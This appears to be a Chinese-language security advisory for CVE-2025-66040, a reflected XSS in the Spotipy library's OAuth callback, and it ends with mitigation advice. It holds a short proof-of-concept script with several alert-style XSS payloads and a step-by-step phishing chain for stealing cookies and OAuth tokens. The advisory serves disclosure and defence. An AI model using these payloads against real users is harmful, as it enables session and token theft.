CVE-2025-66040 Spotipy OAuth回调服务器XSS漏洞

漏洞信息

漏洞编号

CVE-2025-66040

漏洞类型

XSS跨站脚本攻击

CVSS评分

3.6 低危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Spotipy (Python Spotify Web API库)

漏洞概述

CVE-2025-66040是Spotipy库中的一个跨站脚本(XSS)漏洞。Spotipy是一个用于Spotify Web API的Python库，在2.25.2之前的版本中，OAuth回调服务器存在安全漏洞。攻击者可以通过OAuth认证流程中的error参数注入恶意JavaScript代码。由于该参数未经适当的HTML转义和过滤，当认证失败或被中断时，用户浏览器会执行注入的恶意脚本。这允许攻击者窃取用户会话Cookie、劫持OAuth令牌、执行任意客户端操作或进行钓鱼攻击。漏洞的利用需要诱导用户访问特制的OAuth链接并完成认证流程，虽然需要用户交互，但由于攻击隐藏在正常的OAuth重定向过程中，隐蔽性较高。该漏洞已被修复，版本2.25.2包含了安全补丁。

技术细节

漏洞根源在于Spotipy的OAuth回调处理机制。当Spotify OAuth认证流程出现错误时，回调服务器会接收error参数并将其回显到HTML响应页面。问题在于error参数值直接插入到HTML中，没有进行HTML实体编码或输入验证。攻击者可以构造类似error=<script>alert(document.domain)</script>的恶意参数。技术细节包括：1) OAuth回调端点使用Flask开发服务器处理认证回调；2) error参数通过请求对象直接获取并嵌入HTML模板；3) 缺少Content-Security-Policy头保护；4) 没有对error参数进行URL解码后的特殊字符过滤。攻击者可以利用Spotify的OAuth重定向机制，将用户引导至回调URL并携带恶意error参数。由于浏览器会执行回显的JavaScript代码，攻击者可获取用户敏感信息或执行恶意操作。修复方案在回调处理逻辑中添加了html.escape()对error参数进行转义处理。

攻击链分析

STEP 1

步骤1

攻击者构造恶意OAuth URL，在error参数中注入XSS payload，如<script>alert(document.cookie)</script>

STEP 2

步骤2

攻击者通过钓鱼邮件、社交工程或恶意网站诱导用户访问构造的OAuth链接

STEP 3

步骤3

用户浏览器向Spotify OAuth服务器发起认证请求，redirect_uri指向存在漏洞的Spotipy回调端点

STEP 4

步骤4

Spotify OAuth服务器处理认证流程，无论成功或失败都会重定向到回调URL并传递error参数

STEP 5

步骤5

存在漏洞的Spotipy回调服务器接收error参数后，未进行HTML转义直接将payload嵌入响应页面

STEP 6

步骤6

用户浏览器接收到包含恶意脚本的HTML页面并执行，攻击者成功窃取Cookie、OAuth令牌或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import urllib.parse

# CVE-2025-66040 PoC - XSS in Spotipy OAuth callback
# This PoC demonstrates the XSS vulnerability in Spotipy < 2.25.2

# Malicious OAuth callback URL with XSS payload in error parameter
xss_payload = "<script>alert(document.cookie)</script>"
encoded_payload = urllib.parse.quote(xss_payload)

# Construct malicious callback URL
malicious_url = f"http://localhost:8888/callback?error={encoded_payload}"

# Alternative payload variants:
# 1. Event handler based XSS:
payload2 = "<img src=x onerror=alert(document.domain)>"
# 2. DOM manipulation:
payload3 = "<svg/onload=eval(atob('YWxlcnQoJ1hTUycp'))>"

print(f"Malicious OAuth callback URL: {malicious_url}")
print(f"Decoded payload: {xss_payload}")

# When the vulnerable Spotipy server processes this callback:
# 1. It receives the error parameter with XSS payload
# 2. Without sanitization, it renders: <p>Error: <script>alert(document.cookie)</script></p>
# 3. Browser executes the injected JavaScript

# Exploitation scenario:
# 1. Attacker creates a phishing OAuth link with redirect_uri pointing to target
# 2. Victim clicks the link and completes Spotify authentication
# 3. Callback includes malicious error parameter
# 4. Victim's browser executes XSS payload
# 5. Attacker steals OAuth tokens or session data

影响范围

Spotipy < 2.25.2

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在OAuth回调处理代码中手动对所有用户输入参数进行HTML转义处理；2) 部署Web应用防火墙(WAF)过滤恶意XSS payload；3) 限制OAuth回调端点的访问来源；4) 监控和记录异常认证回调请求；5) 提醒用户在完成OAuth认证时注意浏览器弹窗和异常行为。建议尽快升级到官方修复版本2.25.2以彻底解决该漏洞。